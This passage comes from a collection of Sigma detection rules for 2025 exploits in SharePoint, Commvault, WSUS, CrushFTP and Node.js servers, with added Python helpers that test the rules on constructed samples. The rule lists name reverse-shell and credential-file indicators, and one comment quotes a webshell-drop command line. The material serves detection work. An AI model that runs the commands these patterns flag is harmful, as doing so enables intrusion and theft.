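    """selection_uri plus either the RCE markers or a template-injection probe, on decoded text."""
    if FEATUREUSAGE_PATH not in event.get("cs-uri-stem", "").lower():
        return False
    q = normalize_query(event.get("cs-uri-query", ""))
    if "format=" not in q:
        return False
    rce = all(m in q for m in RCE_MARKERS)      # all four, stricter than the rule's hex alternative
    ssti = any(p in q for p in SSTI_PROBES)
    return rce or ssti


# Constructed marker string (not a functional payload) and encodings derived from it
_PLAIN = "format=json${java.lang.Runtime.getMethod(getRuntime).exec(x)}"
SAMPLE_EVENTS = [
    {"cs-uri-stem": FEATUREUSAGE_PATH, "cs-uri-query": _PLAIN},                                        # 0 plain
    {"cs-uri-stem": FEATUREUSAGE_PATH, "cs-uri-query": quote(_PLAIN, safe="=&")},                      # 1 percent-encoded once
    {"cs-uri-stem": FEATUREUSAGE_PATH, "cs-uri-query": quote(quote(_PLAIN, safe="=&"), safe="=&")},    # 2 double-encoded
    {"cs-uri-stem": FEATUREUSAGE_PATH, "cs-uri-query": "format=%7B7%2A7%7D"},                          # 3 {7*7} probe
    {"cs-uri-stem": FEATUREUSAGE_PATH, "cs-uri-query": "format=json&startDate=2025-05-01"},            # 4 benign
    {"cs-uri-stem": "/mifs/login.jsp", "cs-uri-query": _PLAIN},                                        # 5 wrong endpoint
]


def matching_indices(events=SAMPLE_EVENTS):
    """Indices of the sample events that the normalised check flags."""
    return [i for i, ev in enumerate(events) if is_epmm_exploit_attempt(ev)]


if __name__ == "__main__":
    print("flagged:", matching_indices())
    print(decode_literal("%67%65%74%52%75%6e%74%69%6d%65"))
```

decode_literal is the quick way to check what an encoded list entry actually says before a rule ships: percent-decoding each hex literal and comparing it with the comment beside it catches copy errors that would otherwise leave a dead indicator in the rule.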
  {
    "path": "rules-emerging-threats/2025/Exploits/CVE-2025-49144/proc_creation_win_exploit_cve_2025_49144.yml",
    "content": "title: Potential Notepad++ CVE-2025-49144 Exploitation\nid: 933f0bb5-0681-4fe7-8a17-4e6cccbaac44\nstatus: experimental\ndescription: |\n    Detects potential exploitation of CVE-2025-49144, a local privilege escalation vulnerability in Notepad++ installers (v8.8.1 and prior) where the installer calls regsvr32.exe without specifying the full path.\n    This allows an attacker to execute arbitrary code with elevated privileges by placing a malicious regsvr32.exe alongside the legitimate Notepad++ installer.\n    The vulnerability is triggered when the installer attempts to register the NppShell.dll file, which is a component of Notepad++.\nreferences:\n    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-49144\n    - https://x.com/NullSecurityX/status/1937444064867029179\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2025-06-26\ntags:\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.defense-evasion\n    - attack.t1574.008\n    - cve.2025-49144\n    - detection.emerging-threats\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection:\n        Image|endswith: '\\regsvr32.exe'\n        CommandLine|startswith: 'regsvr32 /s'\n        CommandLine|contains: '\\contextMenu\\NppShell.dll'\n    filter_main_legit_regsvr32:\n        Image:\n            - 'C:\\Windows\\System32\\regsvr32.exe'\n            - 'C:\\Windows\\SysWOW64\\regsvr32.exe'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2025/Exploits/CVE-2025-53770/file_event_win_exploit_cve_2025_53770.yml",
    "content": "title: Potential SharePoint ToolShell CVE-2025-53770 Exploitation - File Create\nid: ba479447-721f-42a9-9af2-6dcd517bbdb3\nstatus: experimental\ndescription: |\n    Detects the creation of files such as spinstall0.aspx, which may indicate successful exploitation of CVE-2025-53770.\n    CVE-2025-53770 is a zero-day vulnerability in SharePoint that allows remote code execution.\nreferences:\n    - https://research.eye.security/sharepoint-under-siege/\n    - https://msrc.microsoft.com/blog/2025/07/customer-guidance-for-sharepoint-vulnerability-cve-2025-53770/\n    - https://unit42.paloaltonetworks.com/microsoft-sharepoint-cve-2025-49704-cve-2025-49706-cve-2025-53770/\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2025-07-21\nmodified: 2025-07-24\ntags:\n    - attack.initial-access\n    - attack.t1190\n    - cve.2025-53770\n    - detection.emerging-threats\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    selection:\n        TargetFilename|startswith:\n            - 'C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\'\n            - 'C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\Web Server Extensions\\'\n        TargetFilename|contains:\n            - '\\15\\TEMPLATE\\LAYOUTS\\'\n            - '\\16\\TEMPLATE\\LAYOUTS\\'\n        TargetFilename|endswith:\n            - '\\spinstall.aspx'\n            - '\\spinstall?.aspx'\n            - '\\debug_dev.js'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: critical\n"
  },
  {
    "path": "rules-emerging-threats/2025/Exploits/CVE-2025-53770/proc_creation_win_exploit_cve_2025_53770_indicators.yml",
    "content": "title: Potential SharePoint ToolShell CVE-2025-53770 Exploitation Indicators\nid: 7477881c-ec3b-49d6-aced-7255944e5c59\nstatus: experimental\ndescription: |\n    Detects potential exploitation of CVE-2025-53770 by identifying indicators such as suspicious command lines observed in post-exploitation activity.\n    CVE-2025-53770 is a zero-day vulnerability in SharePoint that allows remote code execution.\nreferences:\n    - https://research.eye.security/sharepoint-under-siege/\n    - https://msrc.microsoft.com/blog/2025/07/customer-guidance-for-sharepoint-vulnerability-cve-2025-53770/\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2025-07-21\ntags:\n    - attack.initial-access\n    - attack.t1190\n    - cve.2025-53770\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        ParentImage|endswith: '\\w3wp.exe'\n    selection_encoded_aspx:\n        - CommandLine|wide|base64offset|contains: 'spinstall0.aspx'\n        - CommandLine|base64|contains: 'spinstall0.aspx'\n    selection_encoded_path:\n        CommandLine|wide|base64offset|contains:\n            - ':\\PROGRA~1\\COMMON~1\\MICROS~1\\WEBSER~1\\15\\TEMPLATE\\LAYOUTS'\n            - ':\\PROGRA~1\\COMMON~1\\MICROS~1\\WEBSER~1\\16\\TEMPLATE\\LAYOUTS'\n            - ':\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\15\\TEMPLATE\\LAYOUTS'\n            - ':\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\16\\TEMPLATE\\LAYOUTS'\n    selection_ioc:\n        CommandLine|contains:\n            - '-EncodedCommand JABiAGEAcwBlADYANABTAHQAcgBpAG4AZwAgAD0'\n            - 'TEMPLATE\\LAYOUTS\\spinstall0.aspx'\n    condition: (selection_img and 1 of selection_encoded_*) or selection_ioc\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
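selection_encoded_aspx and selection_encoded_path above rely on the wide|base64offset|contains modifier chain. PowerShell's -EncodedCommand takes base64 of UTF-16LE text, and because base64 packs three bytes into four characters, the same marker shows up as one of three different strings depending on the byte offset at which it lands. The Python below is an added example, not code from the SigmaHQ repository or from pySigma: it derives those three variants using the prefix-and-trim scheme that, to my knowledge, pySigma uses for base64offset (an assumption about that implementation), and checks them against constructed -EncodedCommand values whose scripts are made up for the demo.

```python
# Added example, not code from the SigmaHQ rule set: what |wide|base64offset|contains matches.
import base64


def base64offset_variants(value: str, wide: bool = True) -> list:
    """Return the three base64 fragments that can represent `value` at any byte alignment.

    For offset i (0..2) the value is encoded with i filler bytes in front, then the leading
    characters that depend on the filler and the trailing characters that depend on whatever
    follows the value are trimmed. Offsets (0, 2, 3) and (None, -3, -2) mirror pySigma's
    base64offset modifier (assumption about that implementation)."""
    raw = value.encode("utf-16-le") if wide else value.encode()
    start = (0, 2, 3)
    end = (None, -3, -2)
    variants = []
    for i in range(3):
        enc = base64.b64encode(b" " * i + raw).decode()
        variants.append(enc[start[i]:end[(len(raw) + i) % 3]])
    return variants


def contains_wide_base64offset(command_line: str, value: str) -> bool:
    """Equivalent of `CommandLine|wide|base64offset|contains: value` (case-sensitive here)."""
    return any(v in command_line for v in base64offset_variants(value, wide=True))


def encoded_command(script: str) -> str:
    """Build the command line PowerShell would see for -EncodedCommand (base64 of UTF-16LE)."""
    return "powershell.exe -EncodedCommand " + base64.b64encode(script.encode("utf-16-le")).decode()


def decode_wide_base64(fragment: str) -> str:
    """Decode a possibly unpadded base64 fragment of UTF-16LE text. If the fragment cuts a
    code unit in half, the missing high byte is assumed to be 0x00 (ASCII text)."""
    raw = base64.b64decode(fragment + "=" * (-len(fragment) % 4))
    if len(raw) % 2:
        raw += b"\x00"
    return raw.decode("utf-16-le")


# Constructed samples: the text before the marker grows by one character (two UTF-16LE bytes)
# per sample, so the marker lands on each of the three possible byte alignments.
SAMPLE_COMMANDS = [
    encoded_command("Set-Content 'C:\\x\\spinstall0.aspx' $s"),
    encoded_command("Set-Content 'C:\\xy\\spinstall0.aspx' $s"),
    encoded_command("Set-Content 'C:\\xyz\\spinstall0.aspx' $s"),
    encoded_command("Get-ChildItem 'C:\\inetpub\\wwwroot'"),   # benign, no marker
]


def matching_indices(commands=SAMPLE_COMMANDS, marker="spinstall0.aspx"):
    """Indices of the sample command lines that carry `marker` in wide base64 at any offset."""
    return [i for i, c in enumerate(commands) if contains_wide_base64offset(c, marker)]


if __name__ == "__main__":
    for v in base64offset_variants("spinstall0.aspx"):
        print(v)
    print("flagged:", matching_indices())
    # The -EncodedCommand prefix listed under selection_ioc is the start of a PowerShell assignment
    print(decode_wide_base64("JABiAGEAcwBlADYANABTAHQAcgBpAG4AZwAgAD0"))
```

The variants are matched case-sensitively here; Sigma's contains is case-insensitive by default, so a backend that lowercases both sides matches slightly more broadly than this code, which is worth remembering when a base64 rule is tuned. decode_wide_base64 runs the process in reverse and is the quickest way to confirm what a fixed base64 IOC such as the one in selection_ioc actually stands for.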
  {
    "path": "rules-emerging-threats/2025/Exploits/CVE-2025-53770/web_win_iis_exploit_cve_2025_53770.yml",
    "content": "title: SharePoint ToolShell CVE-2025-53770 Exploitation - Web IIS\nid: 48d053db-6a56-4866-b60d-0975647050ed\nstatus: experimental\ndescription: |\n    Detects access to vulnerable SharePoint components potentially being exploited in CVE-2025-53770 through IIS web server logs.\n    CVE-2025-53770 is a zero-day vulnerability in SharePoint that allows remote code execution.\nreferences:\n    - https://www.linkedin.com/posts/mauricefielenbach_sharepoint-incidentresponse-windowssecurity-activity-7352653907363303425-bL2f\n    - https://research.eye.security/sharepoint-under-siege/\n    - https://msrc.microsoft.com/blog/2025/07/customer-guidance-for-sharepoint-vulnerability-cve-2025-53770/\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2025-07-21\ntags:\n    - attack.initial-access\n    - attack.t1190\n    - cve.2025-53770\n    - detection.emerging-threats\nlogsource:\n    category: webserver # IIS web server logs\ndetection:\n    selection_exploit_post:\n        cs-method: 'POST'\n        cs-uri-stem|contains: '/_layouts/15/ToolPane.aspx'\n        cs-uri-query|contains: 'DisplayMode=Edit&a=/ToolPane.aspx'\n    selection_exploit_get:\n        cs-method: 'GET'\n        cs-uri-stem|contains: '/_layouts/15/spinstall0.aspx'\n    selection_referer:\n        cs-referer|contains: '/_layouts/SignOut.aspx'\n    condition: 1 of selection_exploit_* and selection_referer\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules-emerging-threats/2025/Exploits/CVE-2025-54309/proc_creation_win_exploit_cve_2025_54309.yml",
    "content": "title: Potential Exploitation of CrushFTP RCE Vulnerability (CVE-2025-54309)\nid: 0fdc7c7f-c690-4217-9ae3-31f5156eed72\nstatus: experimental\ndescription: Detects suspicious child processes created by CrushFTP. It could be an indication of exploitation of an RCE vulnerability such as CVE-2025-54309.\nreferences:\n    - https://reliaquest.com/blog/threat-spotlight-cve-2025-54309-crushftp-exploit/\n    - https://pwn.guide/free/web/crushftp\n    - https://firecompass.com/crushftp-vulnerability-cve-2025-54309-securing-file-transfer-services/\nauthor: Nisarg Suthar\ndate: 2025-08-01\ntags:\n    - attack.privilege-escalation\n    - attack.initial-access\n    - attack.execution\n    - attack.t1059.001\n    - attack.t1059.003\n    - attack.t1068\n    - attack.t1190\n    - cve.2025-54309\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_parent:\n        ParentImage|endswith: '\\crushftp.exe'\n    selection_child_powershell:\n        Image|endswith:\n            - '\\powershell.exe'\n            - '\\powershell_ise.exe'\n            - '\\pwsh.exe'\n        CommandLine|contains|all:\n            - 'IEX'\n            - 'enc'\n            - 'Hidden'\n            - 'bypass'\n    selection_child_cmd:\n        Image|endswith: '\\cmd.exe'\n        CommandLine|contains:\n            - '/c powershell'\n            - 'whoami'\n            - 'net.exe'\n            - 'net1.exe'\n    selection_child_others:\n        Image|endswith:\n            - '\\bitsadmin.exe'\n            - '\\certutil.exe'\n            - '\\mshta.exe'\n            - '\\cscript.exe'\n            - '\\wscript.exe'\n    condition: selection_parent and 1 of selection_child_*\nfalsepositives:\n    - Legitimate administrative command execution\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2025/Exploits/CVE-2025-55182/proc_creation_lnx_exploit_cve_2025_55182_susp_nodejs_server_child_process.yml",
    "content": "title: Linux Suspicious Child Process from Node.js - React2Shell\nid: c70834fa-fb9d-4aa0-9e7d-45ceed36f3f7\nrelated:\n    - id: 271de298-cc0e-4842-acd8-079a0a99ea65\n      type: similar\nstatus: experimental\ndescription: |\n    Detects suspicious child processes spawned from Node.js server processes on Linux systems, potentially indicating remote code execution exploitation such as CVE-2025-55182 (React2Shell).\n    This rule particularly looks for exploitation of a vulnerability on Node.js servers where attackers abuse the Node.js child_process module to execute arbitrary system commands.\n    When execSync() or exec() is used, the command line often includes a shell invocation followed by suspicious commands or scripts (e.g., /bin/sh -c <malicious-command>).\n    For other methods, the Image field will show the spawned process directly.\nreferences:\n    - https://github.com/msanft/CVE-2025-55182\n    - https://nodejs.org/api/child_process.html#class-childprocess\n    - https://gist.github.com/swachchhanda000/a0228130f86a2dedfbcebb415b47f870\n    - https://github.com/nasbench/Misc-Research/blob/2f651ede832ab34027a7ba005b63bb78f1ade378/Other/React-Next-Child-Processes-Notes.md\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems), Nasreddine Bencherchali\ndate: 2025-12-05\ntags:\n    - attack.execution\n    - attack.t1059\n    - attack.initial-access\n    - attack.t1190\n    - detection.emerging-threats\n    - cve.2025-55182\nlogsource:\n    category: process_creation\n    product: linux\ndetection:\n    selection_parent:\n        ParentImage|endswith: '/node'\n        ParentCommandLine|contains:\n            - '--experimental-https'\n            - '--experimental-next-config-strip-types'\n            - '/node_modules/next'\n            - 'next dev'\n            - 'next start'\n            - 'node_modules/.bin'\n            - 'react-scripts start'\n            - 'start-server.js'\n    selection_generic_child_img:\n        # Observed when child_process.spawn(), child_process.exec(), child_process.execFile(), or child_process.fork() method is used to spawn suspicious processes in exploit\n        - Image|endswith:\n              - '/busybox'\n              - '/cat'\n              - '/curl'\n              - '/dash'\n              - '/dig'\n              - '/head'\n              - '/id'\n              - '/ifconfig'\n              - '/ip'\n              - '/java'\n              - '/less'\n              - '/lua'\n              - '/more'\n              - '/nc'\n              - '/ncat'\n              - '/netcat'\n              - '/netstat'\n              - '/nslookup'\n              - '/perl'\n              - '/ping'\n              - '/python'\n              - '/python2'\n              - '/ruby'\n              - '/socat'\n              - '/tail'\n              - '/wget'\n              - '/whoami'\n        - Image|contains: '/python'\n    selection_generic_child_cli:\n        # Observed when child_process.execSync() is used to spawn suspicious processes\n        # Reference: https://nodejs.org/api/child_process.html#child_processexecsynccommand-options\n        # By default, the cli will look something like `/bin/sh -c .......`\n        CommandLine|contains:\n            - '/dev/tcp/'\n            - '/dev/udp/'\n            - '/etc/hosts'\n            - '/etc/passwd'\n            - '/etc/shadow'\n            - 'base64'\n            - 'cat '\n            - 'curl'\n            - 'dig'\n            - 'ifconfig'\n            - 'IO::Socket::INET'\n            - 'java'\n            - 'less '\n            - 'lua'\n            - 'mkfifo '\n            - 'more'\n            - 'nc '\n            - 'ncat'\n            - 'netcat'\n            - 'netstat'\n            - 'nslookup'\n            - 'perl'\n            - 'php'\n            - 'ping'\n            - 'ps -ef'\n            - 'ps aux'\n            - 'python'\n            - 'rcat'\n            - 'ruby'\n            - 'sh -i 2>&1'\n            - '-c id'\n            - 'socat'\n            - 'uname'\n            - 'wget'\n            - 'whoami'\n    selection_specific_sh:\n        Image|endswith: '/sh'\n    selection_specific_cli:\n        Image|endswith: '-c'\n    filter_main_default_shell_flag:\n        Image|endswith: '-c'\n    condition:\n        selection_parent and\n        (\n            1 of selection_generic_*\n            or\n            (selection_specific_sh and not filter_main_default_shell_flag)\n            or\n            (all of selection_specific_* and selection_generic_child_cli)\n        )\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2025/Exploits/CVE-2025-55182/proc_creation_win_exploit_cve_2025_55182_susp_nodejs_server_child_process.yml",
    "content": "title: Windows Suspicious Child Process from Node.js - React2Shell\nid: 271de298-cc0e-4842-acd8-079a0a99ea65\nrelated:\n    - id: c70834fa-fb9d-4aa0-9e7d-45ceed36f3f7\n      type: similar\nstatus: experimental\ndescription: |\n    Detects suspicious child processes started by Node.js server processes on Windows, which may indicate exploitation of vulnerabilities like CVE-2025-55182 (React2Shell).\n    Attackers can abuse the Node.js 'child_process' module to run system commands or scripts using methods such as spawn(), exec(), execFile(), fork(), or execSync().\n    If execSync() or exec() is used in the exploit, the command line often shows a shell (e.g., cmd.exe /d /s /c ...) running a suspicious command unless other shells are explicitly invoked.\n    For other methods, the spawned process appears directly in the Image field unless a shell is explicitly used.\nreferences:\n    - https://github.com/msanft/CVE-2025-55182\n    - https://nodejs.org/api/child_process.html#class-childprocess\n    - https://gist.github.com/swachchhanda000/a0228130f86a2dedfbcebb415b47f870\n    - https://github.com/nasbench/Misc-Research/blob/2f651ede832ab34027a7ba005b63bb78f1ade378/Other/React-Next-Child-Processes-Notes.md\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems), Nasreddine Bencherchali\ndate: 2025-12-05\ntags:\n    - attack.execution\n    - attack.t1059\n    - attack.initial-access\n    - attack.t1190\n    - detection.emerging-threats\n    - cve.2025-55182\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_parent:\n        ParentImage|endswith: '\\node.exe'\n        ParentCommandLine|contains:\n            - '--experimental-https'\n            - '--experimental-next-config-strip-types'\n            - '\\node_modules\\next'\n            - 'next dev'\n            - 'next start'\n            - 'next\" start'\n            - 'node_modules\\\\.bin\\\\\\\\..\\\\next' # We escape every backslash to avoid confusion\n       
     - 'react-scripts start'\n            - 'start-server.js'\n    selection_generic_child_img:\n        # Observed when child_process.spawn(), child_process.exec(), child_process.execFile(), or child_process.fork() method is used to spawn suspicious processes\n        - Image|endswith:\n              - '\\bash.exe'\n              - '\\bitsadmin.exe'\n              - '\\certutil.exe'\n              - '\\cscript.exe'\n              - '\\curl.exe'\n              - '\\ipconfig.exe'\n              - '\\mshta.exe'\n              - '\\net.exe'\n              - '\\net1.exe'\n              - '\\netsh.exe'\n              - '\\nslookup.exe'\n              - '\\OpenConsole.exe'\n              - '\\perl.exe'\n              - '\\ping.exe'\n              - '\\powershell.exe'\n              - '\\pwsh.exe'\n              - '\\py.exe'\n              - '\\python.exe'\n              - '\\pythonw.exe'\n              - '\\pyw.exe'\n              - '\\reg.exe'\n              - '\\regsvr32.exe'\n              - '\\rundll32.exe'\n              - '\\sc.exe'\n              - '\\sh.exe'\n              - '\\systeminfo.exe'\n              - '\\wget.exe'\n              - '\\whoami.exe'\n              - '\\wmic.exe'\n              - '\\wscript.exe'\n              - '\\wt.exe'\n        - Image|contains: '\\python'\n    selection_generic_child_cli_susp_pattern:\n        # Observed when child_process.execSync() is used to spawn suspicious processes\n        # Reference: https://nodejs.org/api/child_process.html#child_processexecsynccommand-options\n        # By default, the command line will look something like `C:\\WINDOWS\\System32\\cmd.exe /d /s /c \"...susp..cli....\"`\n        CommandLine|contains:\n            - '\\net'\n            - 'bitsadmin'\n            - 'certutil '\n            - 'conhost --headless'\n            - 'cscript '\n            - 'curl'\n            - 'ipconfig'\n            - 'java'\n            - 'lua'\n            - 'mshta'\n            - 'netsh'\n            - 'nslookup '\n     
       - 'perl'\n            - 'ping '\n            - 'powershell'\n            - 'pwsh'\n            - 'python'\n            - 'reg '\n            - 'reg.exe'\n            - 'regsvr32'\n            - 'ruby'\n            - 'rundll32'\n            - 'sc.exe'\n            - 'systeminfo'\n            - 'wget'\n            - 'whoami'\n            - 'wmic'\n            - 'wscript'\n    selection_specific_cmd:\n        Image|endswith: '\\cmd.exe'\n    selection_specific_cli:\n        CommandLine|contains: '/d /s /c '\n    filter_main_default_shell_flag:\n        CommandLine|contains: '/d /s /c '\n    filter_main_cli_git:\n        CommandLine|contains: 'git config --local --get remote.origin.url'\n    filter_main_cli_netstat:\n        CommandLine|contains|all:\n            - 'netstat -ano | findstr /C:'\n            - ' | findstr LISTENING'\n    filter_main_cli_mkcert_install:\n        CommandLine|contains|all:\n            - '\\mkcert\\'\n            - ' -install '\n    filter_main_cli_mkcert_caroot:\n        CommandLine|contains|all:\n            - '\\mkcert\\'\n            - ' -CAROOT'\n    condition:\n        selection_parent and\n        (\n            1 of selection_generic_*\n            or\n            (selection_specific_cmd and not filter_main_default_shell_flag)\n            or\n            (all of selection_specific_* and not 1 of filter_main_cli_*)\n        )\nfalsepositives:\n    - Unknown\nlevel: high\nregression_tests_path: regression_data/rules-emerging-threats/2025/Exploits/CVE-2025-55182/proc_creation_win_exploit_cve_2025_55182_susp_nodejs_server_child_process/info.yml\n"
  },
  {
    "path": "rules-emerging-threats/2025/Exploits/CVE-2025-57788/proc_creation_win_exploit_cve_2025_57788.yml",
    "content": "title: Commvault QLogin with PublicSharingUser and GUID Password (CVE-2025-57788)\nid: 917789e1-2c1f-4bf5-8c91-6f71a017f469\nstatus: experimental\ndescription: |\n    Detects a qlogin.exe command attempting to authenticate as the internal `_+_PublicSharingUser_` using a GUID as the password.\n    This could be an indicator of an attacker exploiting CVE-2025-57788 to gain initial access using leaked credentials.\nreferences:\n    - https://labs.watchtowr.com/guess-who-would-be-stupid-enough-to-rob-the-same-vault-twice-pre-auth-rce-chains-in-commvault/\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2025-10-20\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.initial-access\n    - attack.t1078.001\n    - detection.emerging-threats\n    - cve.2025-57788\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains|all:\n            - 'qlogin'\n            - '_+_PublicSharingUser_'\n        # Detects the use of a GUID as the password, which is indicative of an exploit attempt\n        CommandLine|re: '[A-F0-9]{8}-[A-F0-9]{4}-[A-F0-9]{4}-[A-F0-9]{4}-[A-F0-9]{12}'\n    condition: selection\nfalsepositives:\n    - Legitimate administrative scripts that use the `_+_PublicSharingUser_` account for valid purposes.\nlevel: medium\n"
  },
  {
    "path": "rules-emerging-threats/2025/Exploits/CVE-2025-57790/proc_creation_win_exploit_cve_2025_57790.yml",
    "content": "title: Commvault QOperation Path Traversal Webshell Drop (CVE-2025-57790)\nid: bd3b3fff-a018-4994-9876-68af5809160f\nstatus: experimental\ndescription: |\n    Detects the use of qoperation.exe with the -file argument to write a JSP file to the webroot, indicating a webshell drop.\n    This is a post-authentication step corresponding to CVE-2025-57790.\nreferences:\n    - https://labs.watchtowr.com/guess-who-would-be-stupid-enough-to-rob-the-same-vault-twice-pre-auth-rce-chains-in-commvault/\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2025-10-20\ntags:\n    - attack.persistence\n    - attack.t1505.003\n    - detection.emerging-threats\n    - cve.2025-57790\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        # qoperation execute -af F:\\Program Files\\Commvault\\ContentStore\\Reports\\MetricsUpload\\Upload\\ABC1234\\rekt.xml -file F:\\Program Files\\Commvault\\ContentStore\\Apache\\webapps\\ROOT\\wT-poc.jsp\n        CommandLine|contains|all:\n            - 'qoperation'\n            - 'exec'\n            - ' -af '\n            - '.xml '\n            - '\\Apache\\webapps\\ROOT\\'\n            - '.jsp'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2025/Exploits/CVE-2025-57791/proc_creation_win_exploit_cve_2025_57791.yml",
    "content": "title: Commvault QLogin Argument Injection Authentication Bypass (CVE-2025-57791)\nid: ff0225a0-1d9a-4bae-ab26-6038b18bb6d4\nstatus: experimental\ndescription: |\n    Detects the use of argument injection in the Commvault qlogin command - potential exploitation for CVE-2025-57791.\n    An attacker can inject the `-localadmin` parameter via the password field to bypass authentication and gain a privileged token.\nreferences:\n    - https://labs.watchtowr.com/guess-who-would-be-stupid-enough-to-rob-the-same-vault-twice-pre-auth-rce-chains-in-commvault/\nauthor: X__Junior (Nextron Systems), Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2025-10-20\ntags:\n    - attack.initial-access\n    - attack.t1190\n    - detection.emerging-threats\n    - cve.2025-57791\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains|all:\n            - 'qlogin'\n            - ' -cs '\n            - ' -localadmin'\n            - ' -clp '\n            - '_localadmin__'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2025/Exploits/CVE-2025-59287/proc_creation_win_exploit_cve_2025_59287.yml",
    "content": "title: Exploitation Activity of CVE-2025-59287 - WSUS Suspicious Child Process\nid: 43259cc4-1b80-4931-bd98-baea01afc196\nstatus: experimental\ndescription: |\n    Detects the creation of command-line interpreters (cmd.exe, powershell.exe) as child processes of the Windows Server Update Services (WSUS) related process wsusservice.exe.\n    This behavior is a key indicator of exploitation of critical remote code execution vulnerabilities such as CVE-2025-59287, where attackers spawn shells to conduct reconnaissance and further post-exploitation activities.\nreferences:\n    - https://unit42.paloaltonetworks.com/microsoft-cve-2025-59287/\n    - https://www.huntress.com/blog/exploitation-of-windows-server-update-services-remote-code-execution-vulnerability\n    - https://hawktrace.com/blog/CVE-2025-59287-UNAUTH\nauthor: Huntress Labs, Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2025-10-31\ntags:\n    - attack.execution\n    - attack.initial-access\n    - attack.t1190\n    - attack.t1203\n    - cve.2025-59287\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_parent_wsusservice:\n        ParentImage|endswith: '\\wsusservice.exe'\n    selection_parent_w3wp_wsuspool:\n        ParentImage|endswith: '\\w3wp.exe'\n        ParentCommandLine|contains: 'WsusPool'\n    selection_child:\n        Image|endswith:\n            - '\\cmd.exe'\n            - '\\powershell.exe'\n            - '\\pwsh.exe'\n            - '\\powershell_ise.exe'\n    condition: 1 of selection_parent_* and selection_child\nfalsepositives:\n    - If this activity is expected, consider filtering based on specific command lines, user context (e.g., `nt authority\\network service`), or parent process command lines to reduce noise.\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2025/Exploits/CVE-2025-59287/win_wsus_exploit_cve_2025_59287.yml",
    "content": "title: Exploitation Activity of CVE-2025-59287 - WSUS Deserialization\nid: e5f66e87-7d6b-404f-92fe-7aa67814b5cd\nstatus: experimental\ndescription: |\n    Detects cast exceptions in Windows Server Update Services (WSUS) application logs that strongly indicate exploitation attempts of CVE-2025-59287, a deserialization vulnerability in WSUS.\nreferences:\n    - https://unit42.paloaltonetworks.com/cve-2025-59287/\n    - https://hawktrace.com/blog/CVE-2025-59287-UNAUTH\n    - https://github.com/0xBruno/WSUSploit.NET/tree/e239bce9d6b5f46a346e1e4c4d5e0a2a20d5c639\n    - https://www.huntress.com/blog/exploitation-of-windows-server-update-services-remote-code-execution-vulnerability\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2025-10-31\ntags:\n    - attack.execution\n    - attack.initial-access\n    - attack.t1190\n    - attack.t1203\n    - cve.2025-59287\n    - detection.emerging-threats\nlogsource:\n    product: windows\n    service: application\ndetection:\n    selection:\n        Provider_Name: 'Windows Server Update Services'\n        EventID: 7053\n        Data|contains|all:\n            # Indicators of untrusted deserialization exploitation attempts\n            # https://github.com/pwntester/ysoserial.net/issues/114\n            - 'System.InvalidCastException'\n            - 'System.Windows.Data.ObjectDataProvider'\n            - 'Unable to cast object of type'\n            - 'System.Windows.Media.Brush'\n    condition: selection\nfalsepositives:\n    - Legitimate WSUS operations that may trigger similar error messages\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2025/Malware/Atomic-MacOS-Stealer/file_event_macos_malware_amos_persistence.yml",
